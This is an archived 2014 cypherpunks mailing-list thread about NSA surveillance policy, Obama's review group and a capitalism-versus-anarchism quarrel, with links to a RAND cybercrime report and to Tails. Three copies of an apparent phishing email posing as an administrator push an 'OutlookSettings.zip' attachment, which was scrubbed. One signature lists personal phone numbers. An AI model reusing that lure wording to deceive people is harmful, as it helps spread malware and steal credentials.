Date: Thu, 3 Apr 2014 20:49:40 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <533DBDDD.8050102@cpunk.us>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us>
Message-ID:

On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> On 04/03/2014 02:48 PM, Cari Machet wrote:
> >
> >
> >
> > On Thu, Apr 3, 2014 at 3:34 PM,
> > wrote:
> >
> >> Message of 03/04/14 16:54 From: "Cari Machet"
> >>
> >>> Not that journalists should be expected to make a lasting
> >>> difference.
> >>>
> >>>
> >> WTF?
> >>
> >> this shit was posted on huffington post probably for those
> >> without ad blocker there was ad with bewbs on it next to the
> >> text
> >>
> >> one more thing why do you assume to know the minds of the people
> > that own
> >> the snowden data - they are capitalists - that is all
> >>
> >
> > Do capitalists upset you?
> >
> >
> > CAPITALISTS have no concept of reality and are completely self
> > serving yes that is upsetting to my sensibilities and
> > consciousness
>
> Which is *precisely* why I would trust information provided to me by a
> capitalist than that provided to me by an idealist.

i am a fucking anarchist which by the words you use in your writing that point to your low level concepts - you probably have no clue about

you are a capitalist - making frames for others to fit your fucking lame ass argument - pathetic

> A capitalist sees
> everything as a product that will either further his desire for
> success or hinder it. An idealist sees everything as a mission fitting
> within their narrow agenda. A capitalist has much more incentive to
> provide a good product (correct, accurate, information) than an
> idealist who's sole goal is to further an agenda.
> Both have their uses
> though and both can be manipulated to good and bad ends.
>

an anarchist DOES NOT generally have one goal - capitalists think that way anarchists are node based thinkers capitalist are monolithic thinkers and often frame things in a dualistic or black and white manner which is very christian religion in form and thought pattern capitalism is an economic model that has severe ramifications for society it is no different than having a monarch really there is a degree of difference regarding poverty but ... i heard today that if you are dying of cancer in uganda you have a 10% chance of having access to morphine ... they give cancer patients paracetamol ... thats your great capitalism i find it disgusting

> > the careerist journalists laura poitras et al are capitalistic in
> > every way - exploitive
>
> I disagree. The careerist journalists are "crony capitalists" in every
> way.

listen i am an activist journalist making money / becoming famous like them off of journalism in the way they do it is not ok with me its not how i would ever in a million years do my work

> They know that, regardless of the accuracy of their information,
> the 'other side of the coin' will smooth things over and keep the
> public hooked on an inferior product. That's not a true capitalist.
>
>

i think your an idealist actually 'true capitalism' thats a theory

> That's one of my main arguments with socialists and other
> non-capitalist believers:

BELIEVERS????????? LMAO i dont believe in belief that is religious

> they point to our current system and say
> 'see, it's exploitive and hurts people!' and it does. But that's not a
> true capitalist system. Will we ever actually have one? Doubtful. But
> what we have now is definitely not a good example.
>

i dont think you understand that capitalism is well beyond an economy - watch naomi klein

https://www.youtube.com/watch?v=Ka3Pb_StJn4

with capitalism the iraq invasion happened within its frame

black sites torture sites around the globe were conducted within the frame of capitalism

> gitmo 'lives' inside the frame of capitalism

i dont think you understand anarchy or anarchistic thought processes at all

>
> Cypher
> -----BEGIN PGP SIGNATURE-----
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCgAGBQJTPb3RAAoJEFuutbL6JoJrreMP/2KZxGQREZXNWS7Gn1ptqY5N
> zccAmaF7qqTsF24fTCrwQsTR7YdxyCkSWNS6pOI0zNKYGJbTaGAeRj/WEc96vw4H
> zIJyIqFACM8ZGP1VAGnMigw9jWBETOADfH+xY9ifgna/hh+C+PRLWkwYJvMbmMJX
> mrbrQhBV2LAzl2XTmQBRs5NBZsxbwD9E0FXBRJjQD6AJ9GX+caP4ZJqaDK0Wur2w
> mC5YYTa4d49v8/rxQ2u3uOBZr2pdmUcNQNX8wYf5uDk57TYXP/7fyuQtaTK96Jox
> O/CE+3RIk1b1sjOrwz9xkiO9Vug42p+YzPv4q3WcjNao/H8l1zaIMc6hP5vrhhEv
> 6jAuDH3tU4IkIULmt9VZWy62JuHN2u9PV039dUINFbmlWWGHxFLh7KdYfvJBjx4D
> R8ykVdo+ROmpVRyB4QmsbtiyQ4Lur7AaCAlMSpITjVlF2sraDbdO3HfHDhnHIaKc
> xuAtAs09Gqtmx7Omk6YSd1GugDjIHGmOApIbMdfFgV6weo3VsK/c0qsmTWv9dgH6
> LNHBkcNDkfCxiPemzrzqnIKwfBGan2HqiFGff9K0ATjFuK/2Rb+xDtTwwfv2sAbs
> ohuhrA5A0MHqryXJDEFaP5bv+zHoRd/I7V08hijxTLKo/0VdCR89R8GAs5eOYBjj
> nQffL5/0Ikn7v95ez7z7
> =zHw7
> -----END PGP SIGNATURE-----
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 7705 bytes
Desc: not available
URL:

From shelley at misanthropia.info Thu Apr 3 22:28:08 2014
From: shelley at misanthropia.info (shelley at misanthropia.info)
Date: Thu, 03 Apr 2014 22:28:08 -0700
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <20140404042502.7DA6C2280B0@palinka.tinho.net>
References: <20140404042502.7DA6C2280B0@palinka.tinho.net>
Message-ID: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com>

On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote:
>you can take my word, if you like

No offense meant to you personally Dan, because I don't know you, but- I don't trust the word of anyone from In-Q-Tel in matters such as these.

-Shelley

> Responding to various,
>
> Google up Geoff Stone; he's a Constitutional lawyer, clerked for
> Brennan, was Dean of the Law School and then Provost of U Chicago.
> His relationship with President Obama may well result in Obama's
> Presidential Library coming to U Chicago. Maybe that is comforting.
> Maybe that feeds your conclusions about how broad The Conspiracy is.
>
> All of which is irrelevant except that you can take my word, if you
> like, that he is neither a pushover nor a hired hand. The same,
> of course, can be said for all the members of Obama's special
> commission. In my view, the question on the table is means and
> ends. I observe an American public that is trending toward ever
> more risk aversion. If my observation is correct, then you know
> well that it will concentrate power because risk aversion begets a
> demand for absolute safety requires absolute power and absolute
> power corrupts absolutely.
>
> If I may quote another man I hold in personal regard, Joel Brenner's
> (Google him, too) insight is this:
>
> During the Cold War, our enemies were few and we knew who they
> were. The technologies used by Soviet military and intelligence
> agencies were invented by those agencies.
> Today, our adversaries
> are less awesomely powerful than the Soviet Union, but they are
> many and often hidden. That means we must find them before we
> can listen to them. Equally important, virtually every government
> on Earth, including our own, has abandoned the practice of relying
> on government-developed technologies. Instead they rely on
> commercial off-the-shelf, or COTS, technologies. They do it
> because no government can compete with the head-spinning advances
> emerging from the private sector, and no government can afford
> to try. When NSA wanted to collect intelligence on the Soviet
> government and military, the agency had to steal or break the
> encryption used by them and nobody else. The migration to COTS
> changed that. If NSA now wants to collect against a foreign
> general's or terrorist's communications, it must break the same
> encryption you and I use on our own devices... That's why NSA
> would want to break the encryption used on every one of those
> media. If it couldn't, any terrorist in Chicago, Kabul, or
> Cologne would simply use a Blackberry or send messages on Yahoo!
> But therein lies a policy dilemma, because NSA could decrypt
> almost any private conversation. The distinction between
> capabilities and actual practices is more critical than ever...
> Like it or not, the dilemma can be resolved only through oversight
> mechanisms that are publicly understood and trusted -- but are
> not themselves ... transparent.
>
> I fear we are on the edge of a rat-hole here. I forwarded Geoff's
> remarks as they are relevant, timely, and speak to the absence of
> simplistic nostrums in such matters, both because of the rising
> popular / political demand for comfort-and-safety and because the
> technologies that those charged with delivering comfort and safety
> use are COTS technologies. And dual use.
> Personally, I think of
> surveillance as just another tax, which you may safely assume is
> said through clenched libertarian cum Tea Party teeth.
>
> --dan
>

From dan at geer.org Thu Apr 3 21:25:02 2014
From: dan at geer.org (dan at geer.org)
Date: Fri, 04 Apr 2014 00:25:02 -0400
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: Your message of "Wed, 02 Apr 2014 20:29:47 PDT."
Message-ID: <20140404042502.7DA6C2280B0@palinka.tinho.net>

Responding to various,

Google up Geoff Stone; he's a Constitutional lawyer, clerked for Brennan, was Dean of the Law School and then Provost of U Chicago. His relationship with President Obama may well result in Obama's Presidential Library coming to U Chicago. Maybe that is comforting. Maybe that feeds your conclusions about how broad The Conspiracy is.

All of which is irrelevant except that you can take my word, if you like, that he is neither a pushover nor a hired hand. The same, of course, can be said for all the members of Obama's special commission. In my view, the question on the table is means and ends. I observe an American public that is trending toward ever more risk aversion. If my observation is correct, then you know well that it will concentrate power because risk aversion begets a demand for absolute safety requires absolute power and absolute power corrupts absolutely.

If I may quote another man I hold in personal regard, Joel Brenner's (Google him, too) insight is this:

During the Cold War, our enemies were few and we knew who they were. The technologies used by Soviet military and intelligence agencies were invented by those agencies. Today, our adversaries are less awesomely powerful than the Soviet Union, but they are many and often hidden. That means we must find them before we can listen to them. Equally important, virtually every government on Earth, including our own, has abandoned the practice of relying on government-developed technologies.
Instead they rely on commercial off-the-shelf, or COTS, technologies. They do it because no government can compete with the head-spinning advances emerging from the private sector, and no government can afford to try. When NSA wanted to collect intelligence on the Soviet government and military, the agency had to steal or break the encryption used by them and nobody else. The migration to COTS changed that. If NSA now wants to collect against a foreign general's or terrorist's communications, it must break the same encryption you and I use on our own devices... That's why NSA would want to break the encryption used on every one of those media. If it couldn't, any terrorist in Chicago, Kabul, or Cologne would simply use a Blackberry or send messages on Yahoo! But therein lies a policy dilemma, because NSA could decrypt almost any private conversation. The distinction between capabilities and actual practices is more critical than ever... Like it or not, the dilemma can be resolved only through oversight mechanisms that are publicly understood and trusted -- but are not themselves ... transparent.

I fear we are on the edge of a rat-hole here. I forwarded Geoff's remarks as they are relevant, timely, and speak to the absence of simplistic nostrums in such matters, both because of the rising popular / political demand for comfort-and-safety and because the technologies that those charged with delivering comfort and safety use are COTS technologies. And dual use. Personally, I think of surveillance as just another tax, which you may safely assume is said through clenched libertarian cum Tea Party teeth.
--dan


From tpb-crypto at laposte.net Thu Apr 3 15:32:11 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Fri, 04 Apr 2014 00:32:11 +0200
Subject: Geoff Stone, Obama's Review Group
In-Reply-To:
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us>
Message-ID: <966007728.44996.1396564331597.JavaMail.www@wwinf8313>

> Message of 03/04/14 23:19
> From: "Cari Machet"
> To: "Cypher"
> Cc: "cpunks"
> Subject: Re: Geoff Stone, Obama's Review Group
>
> On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA512
> >
> > On 04/03/2014 02:48 PM, Cari Machet wrote:
> > >
> > > On Thu, Apr 3, 2014 at 3:34 PM, wrote:
> > >
> > >> Message of 03/04/14 16:54 From: "Cari Machet"
> > >>
> > >>> Not that journalists should be expected to make a lasting
> > >>> difference.
> > >>>
> > >> WTF?
> > >>
> > >> this shit was posted on huffington post probably for those
> > >> without ad blocker there was ad with bewbs on it next to the
> > >> text
> > >>
> > >> one more thing why do you assume to know the minds of the people
> > >> that own the snowden data - they are capitalists - that is all
> > >>
> > >
> > > Do capitalists upset you?
> > >
> > > CAPITALISTS have no concept of reality and are completely self
> > > serving yes that is upsetting to my sensibilities and
> > > consciousness
> >
> > Which is *precisely* why I would trust information provided to me by a
> > capitalist than that provided to me by an idealist.
>
> i am a fucking anarchist which by the words you use in your writing that
> point to your low level concepts - you probably have no clue about
>
> you are a capitalist - making frames for others to fit your fucking lame
> ass argument - pathetic
>

Cari,

You have been making frames for others all along in your rants, why is it so unacceptable when someone else uses the same device on you?

You are mixing our profession and your wishful thinking and opinions. The two must be separate. Your job is to report facts, not your personal opinions.

The fact that you are not willing to do your job properly when compared to other journalists is what puts Laura Poitras ahead of you and makes her famous and rich ... and you green with envy.

Remember to take your meds - made by capitalists - once in a while, we would all be thankful if you do.


From l at odewijk.nl Thu Apr 3 16:51:32 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Fri, 4 Apr 2014 01:51:32 +0200
Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist)
In-Reply-To: <1575193.mOTzX8i2Ad@lap>
References: <1575193.mOTzX8i2Ad@lap>
Message-ID:

Logic and rationality stand on their own feet and need not be supported by any entity whatsoever, lest it may not be considered logical or reasonable.


From Administrator at jfet.org Thu Apr 3 21:21:39 2014
From: Administrator at jfet.org (Administrator at jfet.org)
Date: 4 Apr 2014 04:21:39 GMT
Subject: Important - New Outlook Settings
Message-ID:

Please carefully read the attached instructions before updating settings.

This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information.
If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: OutlookSettings.zip
Type: application/zip
Size: 6337 bytes
Desc: not available
URL:


From Administrator at jfet.org Thu Apr 3 21:27:36 2014
From: Administrator at jfet.org (Administrator at jfet.org)
Date: 4 Apr 2014 04:27:36 GMT
Subject: Important - New Outlook Settings
Message-ID:

Please carefully read the attached instructions before updating settings.

This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: OutlookSettings.zip
Type: application/zip
Size: 6337 bytes
Desc: not available
URL:


From Administrator at jfet.org Thu Apr 3 21:27:38 2014
From: Administrator at jfet.org (Administrator at jfet.org)
Date: 4 Apr 2014 04:27:38 GMT
Subject: Important - New Outlook Settings
Message-ID:

Please carefully read the attached instructions before updating settings.

This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: OutlookSettings.zip
Type: application/zip
Size: 6337 bytes
Desc: not available
URL:


From gfoster at entersection.org Fri Apr 4 05:57:09 2014
From: gfoster at entersection.org (Gregory Foster)
Date: Fri, 04 Apr 2014 07:57:09 -0500
Subject: RAND study on "Markets for Cybercrime Tools and Stolen Data"
Message-ID: <533EAC25.8050406@entersection.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

RAND National Security Research Division (2014) - "Markets for Cybercrime Tools and Stolen Data: Hackers' Bazaar" by Lillian Ablon, Martin C. Libicki, Andrea A. Golay:
http://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf

HT Cyber Security Law and Policy Blog (Apr 2):
http://blog.cybersecuritylaw.us/2014/04/02/rand-corporation-releases-report-on-markets-for-cybercrime-tools-and-stolen-data/

gf

- --
Gregory Foster || gfoster at entersection.org
@gregoryfoster <> http://entersection.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.19 (Darwin)
Comment: GPGTools - http://gpgtools.org

iQIcBAEBCgAGBQJTPqwjAAoJEMaAACmjGtgj4z8P/3AD6XfqlqAUKDCJ1fyAqy16
gEHylffMmt7IVjUTahi9onYDDpyI2tVEsPuJCANnqEfu/70LTLSOZimSl7uwNP1x
nPMc8JjgztotWoU9jPD/r99PIp5qSmeN0VSaryVYEgihpsmZqit9/oIqKLx8xltf
a+wNwn4EFAgzTsZpTxXGt/6Aki29f6MEnU1bZjpzaudN5PwXZ97gX2MZtZXOBM54
OlNW/J0E3VWXAyJ8Sx9Au5gTOOGCS3EebwAJSBeHbqwCvmcHW9rgpB1Fbny1XU8K
QiM5GFM9oTEmAzdFeTvOZtwHP7hQ6/gO4dI3y3u9Vc0hgK6wycjU4wlOn8ab0SxP
yAD/1UI+iXHGYbGDCHwNFAZFXae+SAJI0DxToaTPVQMVkyjW5CwoM1jlijAXxrg7
41YwZTDOLV3txNBD83MVToeAfpjBoU6MDm43rHKYfowTqykuFkATlCERxrT5igGJ
5N3RFLJMFUgrn/2MxaMRRswynHRGabq/H0T0DPwVN4s74X9A+oI5sOWCtsvgO44W
FqkKq9LEOCARbobF87jGNSAph5DXQ6MZmGfUrp+IRQQrMIKLBevo+6oHfpwrjZ+t
pL5/2BtPJXErl8wvnjmXRmm1R4JEeC21baTwdUXu7u7QGBTmo7lij9UkjTJk5jC/
r/tw1VwX6Ex9yemiitLV
=rLdn
-----END PGP SIGNATURE-----


From carimachet at gmail.com Fri Apr 4 02:11:29 2014
From: carimachet at gmail.com (Cari Machet)
Date: Fri, 4 Apr 2014 09:11:29 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <533DCBB6.8080902@loom.cc>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc>
Message-ID:

On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff wrote:

> Cari Machet wrote, On 04/03/2014 03:48 PM:
>
> > nobody 'owns' anything
>
> Ownership is an exclusive right of use or disposal. If I wake up one
> morning and find you in my house eating my food, you-gonna be in big
> trouble Lucy.
>

its a lie you tell yourself - you were told its true its not

ever heard of eminent domain ?

ever heard of israel?

lets not even talk about your paycheck

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.
From carimachet at gmail.com Fri Apr 4 02:15:57 2014
From: carimachet at gmail.com (Cari Machet)
Date: Fri, 4 Apr 2014 09:15:57 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <966007728.44996.1396564331597.JavaMail.www@wwinf8313>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <966007728.44996.1396564331597.JavaMail.www@wwinf8313>
Message-ID:

On Thu, Apr 3, 2014 at 10:32 PM, wrote:

> > Message of 03/04/14 23:19
> > From: "Cari Machet"
> > To: "Cypher"
> > Cc: "cpunks"
> > Subject: Re: Geoff Stone, Obama's Review Group
> >
> > On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote:
> >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > Hash: SHA512
> > >
> > > On 04/03/2014 02:48 PM, Cari Machet wrote:
> > > >
> > > > On Thu, Apr 3, 2014 at 3:34 PM, wrote:
> > > >
> > > >> Message of 03/04/14 16:54 From: "Cari Machet"
> > > >>
> > > >>> Not that journalists should be expected to make a lasting
> > > >>> difference.
> > > >>>
> > > >> WTF?
> > > >>
> > > >> this shit was posted on huffington post probably for those
> > > >> without ad blocker there was ad with bewbs on it next to the
> > > >> text
> > > >>
> > > >> one more thing why do you assume to know the minds of the people
> > > >> that own the snowden data - they are capitalists - that is all
> > > >>
> > > >
> > > > Do capitalists upset you?
> > > >
> > > > CAPITALISTS have no concept of reality and are completely self
> > > > serving yes that is upsetting to my sensibilities and
> > > > consciousness
> > >
> > > Which is *precisely* why I would trust information provided to me by a
> > > capitalist than that provided to me by an idealist.
> >
> > i am a fucking anarchist which by the words you use in your writing that
> > point to your low level concepts - you probably have no clue about
> >
> > you are a capitalist - making frames for others to fit your fucking lame
> > ass argument - pathetic
> >
>
> Cari,
>
> You have been making frames for others all along in your rants, why is it
> so unacceptable when someone else uses the same device on you?
>
> You are mixing our profession and your wishful thinking and opinions. The
> two must be separate. Your job is to report facts, not your personal
> opinions.
>
> The fact that you are not willing to do your job properly when compared to
> other journalists is what puts Laura Poitras ahead of you and makes her
> famous and rich ... and you green with envy.
>
> Remember to take your meds - made by capitalists - once in a while, we
> would all be thankful if you do.
>

when people have no argument they resort to name calling and character assassination - maybe you should ask more of yourself this level you're on is really boring and predictable

you dont know anything about journalism past maybe the stone age

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.
From carimachet at gmail.com Fri Apr 4 02:21:12 2014
From: carimachet at gmail.com (Cari Machet)
Date: Fri, 4 Apr 2014 09:21:12 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com>
References: <20140404042502.7DA6C2280B0@palinka.tinho.net> <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com>
Message-ID:

On Fri, Apr 4, 2014 at 5:28 AM, wrote:

> On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote:
>
> >you can take my word, if you like
>
> No offense meant to you personally Dan, because I don't know you, but- I
> don't trust the word of anyone from In-Q-Tel in matters such as these.
>
> -Shelley
>

and a constitutional lawyer is in the fucking white house murdering no strike that assassinating us citizens on foreign soil with drone strikes and he is a fucking supposed scholar - the upper echelon just makes itself more and more illegitimate every second

just think if all that brain power had wisdom and ethics and were building instead of destroying or exploiting others

your qualifications for legitimacy are at question dan

> > Responding to various,
> >
> > Google up Geoff Stone; he's a Constitutional lawyer, clerked for
> > Brennan, was Dean of the Law School and then Provost of U Chicago.
> > His relationship with President Obama may well result in Obama's
> > Presidential Library coming to U Chicago. Maybe that is comforting.
> > Maybe that feeds your conclusions about how broad The Conspiracy is.
> >
> > All of which is irrelevant except that you can take my word, if you
> > like, that he is neither a pushover nor a hired hand. The same,
> > of course, can be said for all the members of Obama's special
> > commission. In my view, the question on the table is means and
> > ends. I observe an American public that is trending toward ever
> > more risk aversion. If my observation is correct, then you know
> > well that it will concentrate power because risk aversion begets a
> > demand for absolute safety requires absolute power and absolute
> > power corrupts absolutely.
> >
> > If I may quote another man I hold in personal regard, Joel Brenner's
> > (Google him, too) insight is this:
> >
> > During the Cold War, our enemies were few and we knew who they
> > were. The technologies used by Soviet military and intelligence
> > agencies were invented by those agencies. Today, our adversaries
> > are less awesomely powerful than the Soviet Union, but they are
> > many and often hidden. That means we must find them before we
> > can listen to them. Equally important, virtually every government
> > on Earth, including our own, has abandoned the practice of relying
> > on government-developed technologies. Instead they rely on
> > commercial off-the-shelf, or COTS, technologies. They do it
> > because no government can compete with the head-spinning advances
> > emerging from the private sector, and no government can afford
> > to try. When NSA wanted to collect intelligence on the Soviet
> > government and military, the agency had to steal or break the
> > encryption used by them and nobody else. The migration to COTS
> > changed that. If NSA now wants to collect against a foreign
> > general's or terrorist's communications, it must break the same
> > encryption you and I use on our own devices... That's why NSA
> > would want to break the encryption used on every one of those
> > media. If it couldn't, any terrorist in Chicago, Kabul, or
> > Cologne would simply use a Blackberry or send messages on Yahoo!
> > But therein lies a policy dilemma, because NSA could decrypt
> > almost any private conversation. The distinction between
> > capabilities and actual practices is more critical than ever...
> > Like it or not, the dilemma can be resolved only through oversight
> > mechanisms that are publicly understood and trusted -- but are
> > not themselves ... transparent.
> >
> > I fear we are on the edge of a rat-hole here. I forwarded Geoff's
> > remarks as they are relevant, timely, and speak to the absence of
> > simplistic nostrums in such matters, both because of the rising
> > popular / political demand for comfort-and-safety and because the
> > technologies that those charged with delivering comfort and safety
> > use are COTS technologies. And dual use. Personally, I think of
> > surveillance as just another tax, which you may safely assume is
> > said through clenched libertarian cum Tea Party teeth.
> >
> > --dan
>

--
Cari Machet
NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.


From jya at pipeline.com Fri Apr 4 06:28:21 2014
From: jya at pipeline.com (John Young)
Date: Fri, 04 Apr 2014 09:28:21 -0400
Subject: [cryptography] Tails
In-Reply-To: <533EAF1C.6090006@iang.org>
References: <533EAF1C.6090006@iang.org>
Message-ID:

Informative tweets on Tails security since the fund-raising announcement:

http://cryptome.org/2014/04/tails-security.pdf

At 09:09 AM 4/4/2014, you wrote:
>Has anyone looked at Tails?
>
>http://www.salon.com/2014/04/02/crucial_encryption_tool_enabled_nsa_reporting_on_shoestring_budget/
>
> Crucial encryption tool enabled NSA reporting on shoestring budget
>
>Big players in Snowden revelations publicly praise Tails, in hope of
>gaining much-needed funding for the tool


From dan at geer.org Fri Apr 4 06:53:11 2014
From: dan at geer.org (dan at geer.org)
Date: Fri, 04 Apr 2014 09:53:11 -0400
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: Your message of "Thu, 03 Apr 2014 22:28:08 PDT." <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com>
Message-ID: <20140404135311.316F7228143@palinka.tinho.net>

shelley at misanthropia.info writes:
 | On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote:
 |
 | >you can take my word, if you like
 |
 | No offense meant to you personally Dan, because I don't know you, but- I
 | don't trust the word of anyone from In-Q-Tel in matters such as these.
 |

That is both perfectly fine and perfectly aligned with Geoff's remarks.

--dan


From carimachet at gmail.com Fri Apr 4 03:09:47 2014
From: carimachet at gmail.com (Cari Machet)
Date: Fri, 4 Apr 2014 10:09:47 +0000
Subject: Geoff Stone, Obama's Review Group
In-Reply-To: <533DD10D.8090005@cpunk.us>
References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us>
Message-ID:

On Thu, Apr 3, 2014 at 9:22 PM, Cypher wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> On 04/03/2014 03:49 PM, Cari Machet wrote:
> >
> >> Do capitalists upset you?
> >
> >> CAPITALISTS have no concept of reality and are completely self
> >> serving yes that is upsetting to my sensibilities and
> >> consciousness
> >
> > Which is *precisely* why I would trust information provided to me
> > by a capitalist than that provided to me by an idealist.
> >
> >> i am a fucking anarchist which by the words you use in your
> >> writing that point to your low level concepts - you probably have
> >> no clue about
> >
> >> you are a capitalist - making frames for others to fit your
> >> fucking lame ass argument - pathetic
>
> Actually, Cari, I've done a pretty extensive foray into Anarchism.
> It's an interesting but, IMHO, completely unworkable system populated
> by people who dream of a better, freer world, but have no chance of
> actually creating it - not now at least.
>

that shows how little you know about it for you to think of it on such monolithic terms - it already works is working in many many places and factions so...

> What turned me off about Anarchism were people like you. People who
> waved their moral superiority flag every chance they got and assumed
> that anyone who supported a different view than theirs was ignorant or
> didn't understand what Anarchy is. In a lot of cases, Anarchists are
> their own worst enemy.
>

you're not an anarchist what was your little 'foray' - so french - do tell 1902 chicago?

for your information i am a provocateur that you cannot see that again exclaims your lack of knowledge/care

> > A capitalist sees everything as a product that will either further
> > his desire for success or hinder it. An idealist sees everything as
> > a mission fitting within their narrow agenda. A capitalist has much
> > more incentive to provide a good product (correct, accurate,
> > information) than an idealist whose sole goal is to further an
> > agenda. Both have their uses though and both can be manipulated to
> > good and bad ends.
> >
> >> an anarchist DOES NOT generally have one goal - capitalists think
> >> that way anarchists are node based thinkers capitalist are
> >> monolithic thinkers and often frame things in a dualistic or
> >> black and white manner which is very christian religion in form
> >> and thought pattern
>
> Well, Cari, from what I've seen from the Anarchist community, the main
> goal that anarchist have is to abolish the state. This, of course, is
> a means to an end (the end being personal freedom) but the goal seems
> to be nearly single-minded focus on abolishing the state.
>
> And yes, I know some anarchists will say 'some of us simply ignore the
> state' and that's true. But, in reality, the main 'collective' goal
> (and I use that term loosely) is to abolish the state. To confirm
> this, just talk to any anarchist and ask them what the biggest problem
> to humanity is. Most will say 'the state'. How do you solve it? 'Work
> to abolish the state'. Seems pretty single minded to me.
>
> But, please, instead of ranting and wild arm-waving, educate me if I
> am wrong. I would certainly /love/ to see a workable, large scale,
> anarchistic plan. I admit I probably don't know as much about the
> philosophy as you do. But, instead of just angrily cursing, why not
> try to educate me? I know that's a bit harder than angry arm-waving
> and cursing but it's probably more productive.
>

kool thanks its not just about the state - there are very different types of anarchists - that is part of the quality of it all the form is open - its like the concept of opensource

you are right to a degree it is about personal freedom but that still frames as against the state so i would say it is more about not imposing your will on others instead wanting others to be authentically themselves and 'believe' it or not that has a lot to do with optimal production - each person has a quality like no other ... because some people have qualities that are harmful to others of course there are huge issues of justice within this model and often we are asked about justice - a lot of the community thinks on the level of restorative justice which has models in pockets of society all over the world - one example is in ecuador - the natives have a different form of justice when a crime is committed the gov police are called but then the decision is made with the community what will happen next - will the perp be taken to the government justice system or will the community deal with them - if the community deals with them then they will be asked to perform certain tasks in the community to make up for their misdeeds - some even think it is a good idea for the person to come up with the tasks themselves...

